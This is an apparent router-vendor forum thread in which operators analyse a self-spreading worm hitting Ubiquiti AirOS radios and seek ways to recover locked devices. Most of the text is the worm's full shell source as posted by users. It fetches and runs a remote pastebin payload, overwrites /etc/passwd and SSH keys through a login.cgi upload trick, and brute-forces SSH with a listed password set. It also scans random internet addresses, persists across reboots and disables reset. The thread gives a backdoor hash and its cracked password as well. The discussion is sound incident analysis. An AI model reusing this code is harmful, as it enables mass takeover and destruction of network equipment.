Virus atack v2

You need to upgrade your radios to the latest firmware.  These firmwares are old.  

It awes idea bu there is no acces to radio at all and password changed by virus

what we realy need is discluser of this bug and publicly avale tool to use it to restore acces to the radio

---

@Sergei_kha wrote:

It awes idea bu there is no acces to radio at all and password changed by virus

what we realy need is discluser of this bug and publicly avale tool to use it to restore acces to the radio

---

Can you edit your first post please and put the commind lime output in Code tags <pre>code</pre>

Regards,

---

@ClaudeSS wrote:

You need to upgrade your radios to the latest firmware.  These firmwares are old.  

---

Old firmware don't have upload directory !!! Beware !!!

The password is different

script has a passwd file but inside script is command:

echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

so, the hash is $1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK

anyone crack it?

---

@lsl wrote:

The password is different

script has a passwd file but inside script is command:

echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

 

so, the hash is $1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK

anyone crack it?

---

echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd

This command will add user moth3r to as Administrator to your password file?

No, you don't crack the passwork , you have to bute-force recalculate the hash once you have the salt and  the full hash.  Will take time and CPU.

To start the process I need the exact string in between code tagst (html <pre>code</pre>).

Warning !!!; If you didn't reboot yet just don't !!! , if you do you will be lock out . Get a Linux access , setup a password to your user , go to /etc/passwd, copy the (known)passwd from your user and change the password on Ubiquiti device / save before reboot. Aka Linux boot password bypass without crackjack 

Regards,

PS. I will see you tomorrow

attached mf.tgz

https://www.sendspace.com/file/o10no2

found on ubnt, also with mf.tar

Inside this file is code I pasted

Brutforced it sucsessfully

its fu cker 

no space obviusly

curent situation is

firmware 5.5.10-u    47 units

username moth3r

password fu cker

firmware 5.5.10 

cpassword change by virus and unknown. moth3r/fu ker doent work

I identified attack sours it was an old AirRouter with external ip.

$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/ is f****r

$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1 is not.

checked by hashcat

Does TFTP reset wth firmware upload works ?

We have some devices which have been infected.

The units are PowerBridges and they seem to be rebooting every 30 minutes or so.

The Malware has changed the password as I can't log in with our password or mother/fu****r

I have tried moth3r with all sorts of password but no joy

Can anyone help with this ? 

Jay

---

@lsl wrote:

attached mf.tgz

https://www.sendspace.com/file/o10no2

found on ubnt, also with mf.tar

Inside this file is code I pasted

Thank you for sharing

# ls
download  infect  mfid  mfid.pub  mother  p  passlst  passwd  scan  sprd

# cat download
#!/bin/sh
if [ ! -z "$1" ]
then
for cc in  "http://pastebin.com/raw/vR3xrUcz"
do
wget -O - $cc |tr -d '\r'>/tmp/mfpl$$
k=`grep nomorelies /tmp/mfpl$$ 2>/dev/null | md5sum | cut -d" " -f1`
[ "$k" = "d709745c628f6682ae506d54e4320a28" ] && mv /tmp/mfpl$$ /tmp/mfpl && break
done
rm /tmp/mfpl$$ 2>/dev/null
fi
[ -e /usr/bin/curl ] && exit 0
per=/etc/persistent/.mf
[ -e $per/curl ] && exit 0
test -d $per || mkdir -p $per
test -d /tmp/down || mkdir /tmp/down
cd /tmp/down
dwn() {
wget -O temp.ipk $1
tar -xzf temp.ipk
tar -xzf data.tar.gz
mv $2 $per
rm -rf /tmp/down/*
}
test -e /etc/openwrt_release && owrt=`grep CODENAME /etc/openwrt_release | sed "s/.*=\([^ /]*\).*/\1/g" |tr -d \'`
arc=adm5120
test -e /etc/openwrt_release && arc=`grep TARGET /etc/openwrt_release | sed "s/.*=\([^ /]*\).*/\1/g" | cut -c 2-`
test ! -z "$owrt" && test ! -e /usr/bin/curl && opkg update && opkg install curl
if test ! -e /usr/bin/curl; then
for srv in "downloads.openwrt.org" "bo.mirror.garr.it/mirrors/openwrt"
do
test -e $per/curl || dwn http://$srv/kamikaze/8.09.1/$arc/packages/curl_7.17.1-1_mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/libcurl_7.17.1-1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/libopenssl_0.9.8i-3.1_mips.ipk 'usr/lib/lib*'
test -e $per/libz.so.1 || dwn http://$srv/kamikaze/8.09.1/$arc/packages/zlib_1.2.3-5_mips.ipk 'usr/lib/lib*'
done
fi

I like Robert Redford in Sneakers

# cat infect
#!/bin/sh
trap '' HUP
per=/etc/persistent/.mf
cd $per
crl="LD_LIBRARY_PATH=$per/ ./curl"
test -e /usr/bin/curl && crl=/usr/bin/curl
ip=$1
sshprt=$3
pre=$4
[ $(echo $ip|cut -d. -f1) -eq "127" ] && exit 0
if [ -z "$sshprt" ]
then
for prt in 22 2222
do
is=`sh -c "$crl -s  -m 3 $ip:$prt 2>/dev/null|grep -i dropbear|wc -l"`
[ "$is" = "1" ] && { sshprt=$prt;break; }
done
fi
if [ "$2" = "dbss" ] && [ ! -z "$sshprt" ]
then
( sleep 30 ; killall ssh ) &
cat ../mf.tgz | ssh -p$sshprt -y -y -i mfid moth3r@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
exit 0
fi

cu() {
wh=$1
to=$2
ur=$3
sh -c "$crl -s -m 4 -F 'file=@$per/$wh;filename=../../etc/$to' -H 'Expect:' '$ur/login.cgi' -k 2>/dev/null >/dev/null"
}

if [ ! -z "$sshprt" ] && [ -z "$pre" ]
then
for p in "https" "http"
do
is=`sh -c "$crl -s -L -k -c /tmp/ac -m 3 $p://$ip 2>/dev/null | grep airos | wc -l"`
[ "$is" = "1" ] && { pre=$p;break; }
done
fi


if [ ! -z "$pre" ]
then
echo $ip >> /tmp/inf
cu passwd passwd $pre://${ip}
cu mfid.pub dropbear/authorized_keys $pre://${ip}
( $per/infect $ip dbss $sshprt ) &
elif [ ! -z "$sshprt" ] && [ "$BRUT" = "1" ] && grep BEAR_PASSWOR /usr/bin/ssh 2>/dev/null
then
for usr in root ubnt admin; do
for pwd in $(cat passlst); do
cat ../mf.tgz | DROPBEAR_PASSWORD=$pwd ssh -I3 -p$sshprt -y "$usr"@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
done
done
fi

 Let see the mother

# cat mother
#!/bin/sh
neigh () {
echo 192.168.1.20 > /tmp/near
ubntbox discover|grep ..:..:..:|cut -d" " -f2>>/tmp/near
for ip in `ifconfig | grep Bcast | sed "s/.*Bcast:\([^ ]*\).*/\1/g"`; do ping -c2 $ip;done
ip neigh|cut -d" " -f1|grep -v :>>/tmp/near
for ip in `sort -u /tmp/near`;do
($per/.mf/infect $ip)&
sleep 15
done
}
scneigh () {
max=2500
[ ! -z "$1" ] && max=$1
n=1
for ip in `ifconfig | grep "inet addr:" | grep -v 127.0.0.1 |sed "s/.*inet addr:\([^ ]*\).*/\1/g"`; do
(sleep $((n*max*2)); $per/.mf/scan $ip $max $2>/dev/null >/dev/null )&
n=$((n+1))
done
}
cfg () {
sed -i 's/$1=.*/$1=$2/' /tmp/system.cfg
}
f*ckit () { 
if [ -e /usr/bin/cfgmtd ]
then
grep 'motherf' /tmp/system.cfg>/dev/null || cp /tmp/system.cfg $per/cfg
cfg 'dhcpc.1.status' 'disabled'
cfg 'resolv.host.1.name' 'ubnt'
cfg 'wireless.1.ssid' 'mootherf u c k e r'
cfg 'radio.1.mode' 'Master'
cfg 'system.button.reset' 'disabled'
rm -rf $per/.mf/lib*
(sleep 30; reboot -f) &
/usr/bin/cfgmtd -p /etc -f /tmp/system.cfg -w
fi
}
air () {
[ `cat $per/tick` -gt 4 ] && return
(sleep 3000;reboot -f)&
(wlanconfig ath0 destroy;wlanconfig ath0 create wlandev wifi0 wlanmode sta nosbeacon;iwconfig ath0 essid any;ifconfig ath0 up;iwlist ath0 scan)&
sleep 30
iwlist scan
for cnt in `seq 10`
do
iwlist scan 2>/dev/null| awk -F '[:=]+' '/(ESS)/{ printf $2" " } /level/{printf $4" "} /Encr/{ print $2 }'| grep -v " on" | awk -F' ' '{print $2,$1}'|sort -rn|cut -d'"' -f2>/tmp/aps
killall -9 udhcpc
for ap in `cat /tmp/aps|tr -d'"'`
do
ifconfig ath0 down
iwconfig ath0 essid $ap
ifconfig ath0 up
sleep 40
/sbin/udhcpc -q -f -i ath0 -s /etc/udhcpc/udhcpc -p /tmp/dhp -hmf$$
if [ $? -eq 0 ]
then
neigh
fi
done
done
reboot -f
}
loop () {
per=/etc/persistent
test -d $per/.mf || mkdir -p $per/.mf
cd $per/.mf
echo $((`cat $per/tick 2>/dev/null`+1)) > $per/tick
(cfgmtd -w -p /etc)&
[ `cat $per/tick` -gt 30 ] && f*ckit
shl=`cat /etc/shells | head -1`
test -z "$shl" && shl=/bin/sh
grep "moth3r" /etc/passwd >/dev/null || echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >/etc/passwd
for prt in 80 443; do
iptables -I INPUT -p tcp --dport $prt -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport $prt -j DROP 2>/dev/null
done
sleep 200
$per/.mf/download;
cnt=0
($per/.mf/sprd 2>/dev/null >/dev/null)&
($per/.mf/sprd 2>/dev/null >/dev/null)&
($per/.mf/sprd 2>/dev/null >/dev/null)&
while true
do
[ "$cnt" -eq 5000 ] && f*ckit
[ $((`date "+%H"`%3)) -eq 0 ] && [ "$cnt" -eq 15 ] && air
[ $((cnt%10)) -eq 0 ] && $per/.mf/download up
[ $((cnt%10)) -eq 0 ] && [ -e /tmp/mfpl ] && chmod +x /tmp/mfpl* && /tmp/mfpl
[ $((cnt%60)) -eq 0 ] && neigh
[ $((cnt%180)) -eq 0 ] && scneigh
[ $((cnt%300)) -eq 0 ] && scneigh 900 -4
pidof sprd>/dev/null || ($per/.mf/sprd 2>/dev/null >/dev/null)&
cnt=$((cnt+1))
sleep 60
done
}
if [ -z "$1" ]
then
($0 1)&
else
loop
fi

# cat p
#!/bin/sh
per=/etc/persistent
shl=`cat /etc/shells | head -1`
test -z "$shl" && shl=/bin/sh
grep "moth3r" /etc/passwd >/dev/null || echo 'moth3r:$1$RpWdAhdc$cNgp9llO5jKApRaG8b4nK1:0:0:Administrator:/etc/persistent:'$shl >> /etc/passwd
grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd $per;tar -zxf mf.tgz;$per/.mf/mother&">>$per/rc.poststart
chmod +x $per/rc.poststart
test -e /etc/rc.local && cat $per/rc.poststart>/etc/rc.local
if [ -e /usr/bin/cfgmtd ]
then
echo -n >/etc/dropbear/authorized_keys
cfgmtd -w -p /etc/; sleep 30; reboot -n -f >/dev/null
fi

# cat scan
#!/bin/sh
trap '' HUP
cd /etc/persistent/.mf/
ip=$1
p1=$(echo $ip | cut -d "." -f1)
test ! -z "$p1" || p1=1
p2=$(echo $ip | cut -d "." -f2)
test ! -z "$p2" || p2=0
p3=$(echo $ip | cut -d "." -f3)
test ! -z "$p3" || p3=0
p4=$(echo $ip | cut -d "." -f4)
test ! -z "$p4" || p4=1
p3c=0
p2c=0
p1c=0
[ ! -z "$3" ] && [ "$3" -gt 0 ] &&  p4=$((p4+$3))
[ ! -z "$3" ] && [ "$3" -lt 0 ] && [ $(($p3+$3)) -ge 0 ] &&  p3=$((p3+$3))
if [ "$p4" -gt 255 ]
then
d=$((p4/256))
echo LOG:here $d $p4
p4=$((p4%256))
p3=$((p3+d))
p3=$(($p3%256))
fi
maxp1=128
maxp2=256
cnt=0
test $p1 -eq "10" && pvt=0
test $p1 -eq "192" -a $p2 -eq "168" && pvt=0 && maxp2=1
test $p1 -eq "172" -a $p2 -eq "16" && pvt=0 && maxp2=1
test ! -z "$pvt" && maxp1=1
while [ $p1c -lt $maxp1 ]
do
while [ $p2c -lt $maxp2 ]
do
while [ $p3c -lt 256 ]
do
while [ $p4 -lt 255 ]
do
ip="$p1.$p2.$p3.$p4"
./infect $ip
p4=$((p4+1))
cnt=$((cnt+1))
[ ! -z "$2" ] && [ "$cnt" -gt "$2" ] && exit 0
done
p4=1
p3=$((p3+1))
if [ "$p3" -gt 255 ] ; then p3=0 ; fi
p3c=$((p3c+1))
done
p4=0
p3c=0
p3=0
p2=$((p2+1))
if [ "$p2" -gt 255 ] ; then p2=0 ; fi
p2c=$((p2c+1))
done
p4=0
p3=0
p3c=0
p2=0
p2c=0
p1=$((p1+1))
if [ "$p1" -gt 223 ] ; then p1=1 ; fi
p1c=$((p1c+1))
done

# cat sprd
#!/bin/sh
per=/etc/persistent/.mf
cd $per
test -e /usr/bin/curl && crl=/usr/bin/curl
test -e /usr/bin/curl || test -e $per/curl || ./download
cnt=0
while true; do
ip=`dd if=/dev/urandom bs=4 count=1 2>/dev/null | hexdump -e '4/1 "%u."' -e '"\n"' | cut -d. -f1-4`
$per/infect $ip
if [ "$cnt" = 10000 ] ; then
if [ "$BRUT" = "1" ]
then
export BRUT=0
cnt=0
else
export BRUT=1
cnt=9500
fi
fi
cnt=$((cnt+1))
done

Hmm , smart way to generate random IP, this is not only private networks.

# cat passlst
admin
root
ubnt
ubnt123
password
abcd1234
abcdefgh
qwerty
abc123
111111
123456
123123
123qwe
12345678
admin1
!@#$%^&*
ubiquiti
000000
1q2w3e4r
!Q@W#E$R
1qaz2wsx

Look like the mfid file is the dropbear ssh-rsa private key and mfid.pub is the public file.

Thanks for sharing again, is raining outside perfect day for reading.

Regards,

PS. This look like similar to Steve Gibson grc.com attack

i am having the same issue

mother

moth3r

f u c k er

None are working ... Http, https turned off on antenna's now and can only ssh

UBNT any ideas ?

what type is this passwd hash? anyone knows?

---

@Heavyd wrote:
 

None are working ... Http, https turned off on antenna's now and can only ssh

 

---

Do you know howto fix from ssh?

Conclusion:

This is a user/password attack over ssh

if [ ! -z "$pre" ]
then
echo $ip >> /tmp/inf
cu passwd passwd $pre://${ip}
cu mfid.pub dropbear/authorized_keys $pre://${ip}
( $per/infect $ip dbss $sshprt ) &
elif [ ! -z "$sshprt" ] && [ "$BRUT" = "1" ] && grep BEAR_PASSWOR /usr/bin/ssh 2>/dev/null
then
for usr in root ubnt admin; do
for pwd in $(cat passlst); do
cat ../mf.tgz | DROPBEAR_PASSWORD=$pwd ssh -I3 -p$sshprt -y "$usr"@${ip} "mkdir -p /etc/persistent/.mf; cat > /etc/persistent/mf.tgz; cd /etc/persistent/;tar -zxf mf.tgz;/etc/persistent/.mf/p"
done
done
fi

Will try login username root ubnt admin and one of the following passwords:

admin root ubnt ubnt123 password abcd1234 abcdefgh qwerty abc123 111111 123456 123123 123qwe 12345678 admin1 !@#$%^&* ubiquiti 000000 1q2w3e4r !Q@W#E$R 1qaz2wsx

On infected devices the attack will stop when the ouput of the following URL http://pastebin.com/raw/vR3xrUcz

will be nomorelies ...

Look like the revenge of the Pink Panther and is personal.

Same issue here. AC2 is saying "invalid login credentials" on over 1800 devices now, and 2440 are offline! Tha's more than 80% of our network! Unbelievable. Is it an AC2 virus? Can ANYONE please crack this "new" password asap??? 

These are all PRIVATE, not public exposed devices, and if the virus was to spread on the same subnet, that is wrong because this is across different subnets and towers, routers, everything. ONLY thing connecting all these together is AC2, could it be an AC2 virus!?!?

This is the worst disaster in our WISP history, and it'd be impossible to make over 2,000 truck rolls to reset devices and re-program. 

PLEASE ANYONE?!?!

redirect pastebin to some http server with prepared file helps?